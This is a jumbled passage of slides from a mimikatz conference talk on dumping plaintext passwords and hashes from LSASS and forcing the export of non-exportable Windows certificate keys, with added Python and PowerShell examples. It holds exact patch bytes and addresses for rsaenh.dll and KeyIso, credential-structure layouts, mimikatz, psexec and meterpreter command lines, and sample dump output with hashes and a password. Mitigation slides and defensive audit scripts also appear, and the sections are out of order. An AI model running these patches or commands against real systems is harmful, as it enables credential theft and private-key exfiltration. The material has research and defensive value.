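    changed = sum(a != b for a, b in zip(code, patched))
    return patched.hex().upper(), branch_target(addr, code), changed


# From the slides: two jnz on the rsaenh.dll export path, one in the KeyIso export path.
SLIDE_PATCHES = {
    'rsaenh.1': (0x0AC0B7CB, bytes.fromhex('0F8533C7FFFF')),
    'rsaenh.2': (0x0AC1F749, bytes.fromhex('0F85B63BFFFF')),
    'keyiso':   (0x6C815210, bytes.fromhex('751C')),
}


def patch_all(patches=SLIDE_PATCHES):
    return {name: verify_patch(addr, code) for name, (addr, code) in patches.items()}


if __name__ == '__main__':
    for name, (hexbytes, target, changed) in patch_all().items():
        print('%-8s -> %-12s  target 0x%08X  %d byte(s) changed' % (name, hexbytes, target, changed))
```

Running it reproduces the slide counts: 2 + 2 bytes for the two CAPI patches, 1 byte for the CNG one, and in every case the rewritten jump lands exactly where the original jnz did, which is why the displacement never needs recomputing.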
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations

The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil!
Before the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo

Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?

Exactly the same as for sekurlsa: it will prevent access to accounts / the computer – no admin, no admin, no admin…

Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact

blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList → search the linked list for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time

sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?

Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching

~ Boring ~… let's be more brutal this time: make a WinDBG trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.

0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3

0: kd> .reload /user
Loading User Symbols

0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?

Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider!
Yeah! Pass-the-hash capability with a Live account too…
A Live user can log on through RDP via SSO.
mimikatz :: sekurlsa :: livessp :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search the linked list for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?

Me: yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search the linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"

Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)

From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
  – NTLM hash on the client…
  – the KDC sent it back as a gift!
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it.

Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…

mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5

Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESX

[Diagram: lsasrv globals inside the lsass process: g_pRandomKey → BYTE[g_cbRandomKey]; g_cbRandomKey (DWORD, 256); g_pDESXKey → BYTE[144]; g_Feedback (BYTE[8]). mimikatz loads its own lsasrv.dll and copies… these values out of lsass into the same globals of its own lsasrv, then calls LsaUnprotectMemory locally]
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6

Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES

[Diagram: lsasrv globals inside the lsass process: InitializationVector (BYTE[16]); h3DesKey and hAesKey, each a handle pointing to a KIWI_BCRYPT_KEY whose cle member points to the KIWI_BCRYPT_KEY_DATA holding the key material. mimikatz copies… the IV and both key structures out of lsass into its own lsasrv]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages

Package          Symbols                                              Type
tspkg            tspkg!TSGlobalCredTable                              RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                   LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                        LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                 RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG

Protection Keys

Key    NT 5 Symbols
RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key    NT 6 Symbols
       lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
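The LIST_ENTRY half of this table (wdigest!l_LogSessList, livessp!LiveGlobalLogonSessionList, kerberos!KerbLogonSessionList) is walked the same way in the wdigest, livessp and kerberos (nt5) workflows above: enumerate LUIDs, follow Flink from the list head until it comes back, match the LUID, then read the LSA_UNICODE_STRING fields. The following is an added example for this page, not mimikatz code. It runs the walk over a constructed 32-bit memory image; the entry offsets, the load address and the session data are made up for the demo (the real KIWI_* layouts change between Windows builds, which is why mimikatz ships a per-version offset table), and the strings are stored already decrypted, where a live LSASS would need LsaUnprotectMemory or the imported lsasrv keys first.

```python
"""Walk a LIST_ENTRY-linked logon-session list in a memory image and read the
LSA_UNICODE_STRING fields of the entry matching a LUID.

Added example, not mimikatz code. Layout, addresses and sessions below are
constructed for the demo (32-bit pointers); real KIWI_* offsets differ per build.
"""
import struct

# Constructed entry layout (NOT the real wdigest one):
#   0x00 Flink  0x04 Blink  0x08 UsageCount  0x0C This  0x10 LUID (8 bytes)
#   0x18 UserName  0x20 Domain  0x28 Password, each an LSA_UNICODE_STRING
#   (USHORT Length, USHORT MaximumLength, PVOID Buffer -> 8 bytes on 32-bit)
ENTRY_SIZE = 0x30
OFF_LUID, OFF_USER, OFF_DOMAIN, OFF_PASSWORD = 0x10, 0x18, 0x20, 0x28


class Image:
    """Flat byte image with a base virtual address, standing in for a dump."""
    def __init__(self, base, data):
        self.base, self.data = base, data

    def read(self, va, size):
        off = va - self.base
        if off < 0 or off + size > len(self.data):
            raise ValueError('read outside image: 0x%08X' % va)
        return self.data[off:off + size]

    def u32(self, va):
        return struct.unpack('<I', self.read(va, 4))[0]

    def u64(self, va):
        return struct.unpack('<Q', self.read(va, 8))[0]


def read_lsa_unicode_string(img, va):
    length, _maxlen, buf = struct.unpack('<HHI', img.read(va, 8))
    if length == 0 or buf == 0:
        return ''
    return img.read(buf, length).decode('utf-16-le')


def walk_list(img, head_va):
    """Yield entry addresses; stop when Flink returns to the head or loops."""
    seen, cur = set(), img.u32(head_va)
    while cur != head_va and cur not in seen:
        seen.add(cur)
        yield cur
        cur = img.u32(cur)


def find_session(img, head_va, luid):
    """'search linked list for LUID' from the workflow slides."""
    for entry in walk_list(img, head_va):
        if img.u64(entry + OFF_LUID) == luid:
            return {
                'UserName': read_lsa_unicode_string(img, entry + OFF_USER),
                'Domain': read_lsa_unicode_string(img, entry + OFF_DOMAIN),
                'Password': read_lsa_unicode_string(img, entry + OFF_PASSWORD),
            }
    return None


def build_image(base, sessions):
    """Construct a demo image: list head at base, entries after it, strings at the end."""
    n, head = len(sessions), base
    entries = [base + 8 + i * ENTRY_SIZE for i in range(n)]
    strings_va = base + 8 + n * ENTRY_SIZE
    blob, packed = bytearray(), []
    for luid, user, domain, password in sessions:
        fields = b''
        for s in (user, domain, password):
            enc = s.encode('utf-16-le')
            fields += struct.pack('<HHI', len(enc), len(enc) + 2, strings_va + len(blob))
            blob += enc + b'\x00\x00'
        packed.append((luid, fields))
    first = entries[0] if n else head
    last = entries[-1] if n else head
    data = bytearray(struct.pack('<II', first, last))          # head LIST_ENTRY
    for i, (luid, fields) in enumerate(packed):
        flink = entries[i + 1] if i + 1 < n else head
        blink = entries[i - 1] if i else head
        data += struct.pack('<IIII', flink, blink, 1, entries[i])  # Flink, Blink, UsageCount, This
        data += struct.pack('<Q', luid) + fields
    return Image(base, bytes(data + blob))


# Constructed sessions; the user echoes the slide's demo output (LUID 0;234870).
SESSIONS = [
    (0x3E7, 'VM-W8-RP-X$', 'WORKGROUP', ''),
    (234870, 'Gentil Kiwi', 'vm-w8-rp-x', 'waza1234'),
]
HEAD_VA = 0x00A00000   # stands in for the address of wdigest!l_LogSessList


def demo():
    img = build_image(HEAD_VA, SESSIONS)
    return {luid: find_session(img, HEAD_VA, luid) for luid, *_ in SESSIONS}


if __name__ == '__main__':
    for luid, creds in demo().items():
        print('LUID 0x%X -> %s' % (luid, creds))
```

The loop guard in walk_list (stop at the head, refuse to revisit an entry) is what keeps a corrupt or mid-update list from spinning forever when reading another process's memory; the per-package symbol in the table above is only the address you hand in as head_va.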
mimikatz :: sekurlsa :: memo

Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
  http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ACTIVATE the SeDebugPrivilege privilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentication Id      : 0;234870
Authentication package : NTLM
Primary user           : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
        msv1_0 :    User: Gentil Kiwi  Domain: vm-w8-rp-x
                    LM hash   : d0e9aee149655a6075e4540af1f22d3b
                    NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos :  User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
        wdigest :   User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
        tspkg :     User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
        livessp :   n.t. (LUID KO)
mimikatz sekurlsa what we can do

Basics
 – No physical access to the computer (first step to pass the hash, then pass the pass)
 – No admin rights, system rights, debug privileges (…)
 – Disable local admin accounts
 – Strong passwords (haha, it was a joke, so useless)
 – For privileged accounts, network logon instead of interactive (when possible)
 – Audit: pass the hash keeps traces and can lock accounts
 – No admin rights, system rights, debug privileges, even for VIPs
 – Use a separated network (or forest) for privileged tasks

More in depth
 – Force strong authentication (SmartCard & Token) $ €
 – Short validity for Kerberos tickets
 – No delegation
 – Disable NTLM (available with NT6)
 – No exotic stuff
   • biometrics (it keeps the password somewhere and pushes it to Windows)
   • single sign on
 – Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
 – Take the opportunities to stop retro-compatibility
 – Disable faulty providers
   • Is it supported by Microsoft?
   • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
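A local check for two of the basics above (who holds the debug privilege, and whether NTLM is restricted), as an added example that is not part of the talk or of mimikatz. It assumes an elevated Windows PowerShell 5.x prompt with secedit.exe available; the function names Get-DebugPrivilegeHolders and Get-NtlmRestrictionState are my own, and the registry values are the ones behind the "Network security: Restrict NTLM" and "LAN Manager authentication level" policies of Windows 7 / 2008 R2 and later.

```powershell
# Added example, not from the talk: audit two of the "basics", SeDebugPrivilege
# holders and NTLM restriction, on the local machine.
# Assumptions: elevated Windows PowerShell 5.x, secedit.exe present.

function Get-DebugPrivilegeHolders {
    # secedit exports the local policy as a UTF-16 .inf whose [Privilege Rights]
    # section has one line per right: "SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-..."
    $inf = Join-Path $env:TEMP 'secpol-audit.inf'
    secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
    try {
        $line = Get-Content -Path $inf -Encoding Unicode |
                Where-Object { $_ -match '^\s*SeDebugPrivilege\s*=' } |
                Select-Object -First 1
    } finally {
        Remove-Item -Path $inf -ErrorAction SilentlyContinue
    }
    if (-not $line) { return @() }   # right assigned to nobody: the ideal state
    ($line -split '=', 2)[1] -split ',' | ForEach-Object {
        $sid = $_.Trim().TrimStart('*')
        try {
            ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch { $sid }   # SID of a deleted account: report it raw
    }
}

function Get-NtlmRestrictionState {
    # Registry values behind the "Restrict NTLM" and "LAN Manager authentication
    # level" policies (Windows 7 / 2008 R2 and later).
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv = "$lsa\MSV1_0"
    $read = { param($Key, $Name)
        (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name }
    [pscustomobject]@{
        LmCompatibilityLevel         = & $read $lsa 'LmCompatibilityLevel'          # 5 = NTLMv2 only, refuse LM & NTLM
        RestrictSendingNTLMTraffic   = & $read $msv 'RestrictSendingNTLMTraffic'    # 2 = deny all outgoing NTLM
        RestrictReceivingNTLMTraffic = & $read $msv 'RestrictReceivingNTLMTraffic'  # 2 = deny all incoming NTLM
        AuditReceivingNTLMTraffic    = & $read $msv 'AuditReceivingNTLMTraffic'     # 2 = audit all incoming NTLM
    }
}

'SeDebugPrivilege is held by:'
Get-DebugPrivilegeHolders
'NTLM settings (blank = value not set, the OS default applies):'
Get-NtlmRestrictionState | Format-List
```

By default SeDebugPrivilege is granted to the local Administrators group, which is exactly why the slides insist on "no admin rights": any member can open LSASS. Run the NTLM part in audit mode (value 1) before switching to deny (value 2), so that applications still relying on NTLM show up in the event log first.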
(slide 37)
mimikatz crypto what is it

A little module that I wrote to:
 – play with Windows Cryptographic API, CNG and RSA keys
 – automate export of certificates/keys
   • even those which are “not” exportable

What the crypto module can do:
 – List
   • Providers
   • Stores
   • Certificates
   • Keys
 – Export
   • Certificates
     – public part in DER format
     – with private keys in PFX format
   • Private keys in PVK format – it's cool, OpenSSL can deal with it too
 – Patch
   • CryptoAPI in mimikatz context
   • CNG in LSASS context (again ;)

(slide 38)
mod_mimikatz_crypto
mimikatz crypto how it's protected

Private keys are DPAPI protected
 – You cannot reuse private key files on another computer
   • at least not without the master keys and/or passwords of the users

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
 – Yes, a computer/server opens a “session”

Export/Usage can be limited by:
 – Password
 – Popup
 – Export/Archive flag not present
(slide 39)
(Password / Popup: a constraint for most users; unavailable for computer keys)

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
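A defender-side inventory of the protections listed above, as an added example that is not mimikatz code and not from the talk: for every certificate with a private key it reports the API (CryptoAPI or CNG), the provider, the export flag, the CNG archive flag and whether a UI prompt (the “popup”) protects the key. It assumes Windows PowerShell 5.x on .NET Framework 4.6 or later (for RSACertificateExtensions) and defaults to the current user's My store; the function name Get-PrivateKeyProtection is my own.

```powershell
# Added example, not mimikatz code: report how each private key in a certificate
# store is protected, covering both CryptoAPI (CSP) and CNG (KSP) keys.
# Assumptions: Windows PowerShell 5.x on .NET Framework 4.6+; default store is
# the current user's "My" store.

function Get-PrivateKeyProtection {
    param([string]$StorePath = 'Cert:\CurrentUser\My')

    foreach ($cert in Get-ChildItem -Path $StorePath | Where-Object { $_.HasPrivateKey }) {
        $r = [ordered]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            Api        = 'non-RSA or inaccessible'
            Provider   = $null
            Exportable = $null   # export flag granted at import time
            Archivable = $null   # CNG only: archive flag
            UiPrompt   = $null   # the "popup": strong private key protection
        }
        try {
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
        } catch { $rsa = $null }   # e.g. smartcard not inserted

        if ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            # CryptoAPI: the flags live in the CSP key container (rsaenh.dll & co.)
            $info = $rsa.CspKeyContainerInfo
            $r.Api        = 'CAPI'
            $r.Provider   = $info.ProviderName
            $r.Exportable = $info.Exportable   # imported with CRYPT_EXPORTABLE
            $r.UiPrompt   = $info.Protected    # imported with CRYPT_USER_PROTECTED
        }
        elseif ($rsa -is [System.Security.Cryptography.RSACng]) {
            # CNG: the policy is stored with the key in the KSP and enforced by the
            # KeyIso service inside LSASS rather than in the caller's process
            $key    = $rsa.Key
            $policy = $key.ExportPolicy
            $r.Api        = 'CNG'
            $r.Provider   = $key.Provider.Provider
            $r.Exportable = ($policy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0
            $r.Archivable = ($policy -band [System.Security.Cryptography.CngExportPolicies]::AllowArchiving) -ne 0
            $r.UiPrompt   = $key.UIPolicy.ProtectionLevel -ne [System.Security.Cryptography.CngUIProtectionLevels]::None
        }
        [pscustomobject]$r
    }
}

Get-PrivateKeyProtection | Format-Table -AutoSize
```

Keys reported with Exportable = False are the ones the following slides show being exported anyway once the check in rsaenh.dll or in the KeyIso service is patched: the flag is a policy bit tested by code, not a cryptographic barrier, which is why the talk's own recommendation for these keys is smartcards, tokens or an HSM. Run the function against Cert:\LocalMachine\My from an elevated prompt to cover computer keys, where the password and popup protections are not available at all.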
mimikatz crypto capi how it works

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
 – cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…

(slide 40)
mimikatz crypto capi how it's exported ( level)

(slide 41)

[Diagram: a process asks CryptoAPI (RSA CSP) to export a key; the CSP loads the private key (DPAPI decode) and checks the export flag: exportable = yes → Exported Key; no → NTE_BAD_KEY_STATE. Labels on the slide: Process, CryptoAPI and RSA CSP, Load Private Key, Ask to export Key, Exported Key, PLAYSKOOL]
mimikatz crypto patchcapi because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

(slide 42)

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

(callout on both outputs: Exportable)
mimikatz crypto patchcapi because I own my process

So what? A module in my own process returns that I can't do something?
CryptoAPI is in my memory space: let's patch it.

I wrote “4” bytes in my memory space.

(slide 43)

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz   continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp   continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz   continue_key_export_or_archive_prepare
